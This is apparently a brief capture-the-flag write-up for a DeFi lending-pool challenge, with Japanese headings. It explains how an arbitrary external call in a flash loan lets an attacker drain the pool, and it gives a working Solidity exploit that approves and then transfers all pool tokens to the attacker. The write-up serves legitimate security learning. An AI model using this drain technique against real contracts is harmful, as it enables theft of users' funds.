答えを理解する

絞る

引数を理解する

Question

In this case, a new pool has launched offering free flash loans of DVT tokens.

Currently the pool has 1 million DVT tokens in balance. And you have nothing.

But don't worry, you might be able to steal them all from the pool.


(bool success, ) = target.call(data);
        require(success, "External call failed");
  1. all token is approving to attacker address
  2. and then, withdraw all token to attacker
function attack(IERC20 token, ITrusterLenderPool pool, address attackerEOA)
    public
{
    uint256 poolBalance = token.balanceOf(address(pool));
    // IERC20::approve(address spender, uint256 amount)
    // flashloan executes "target.call(data);", approve our contract to withdraw all liquidity
    bytes memory approvePayload = abi.encodeWithSignature("approve(address,uint256)", address(this), poolBalance);
    pool.flashLoan(0, attackerEOA, address(token), approvePayload);

    // once approved, use transferFrom to withdraw all pool liquidity
    token.transferFrom(address(pool), attackerEOA, poolBalance);
}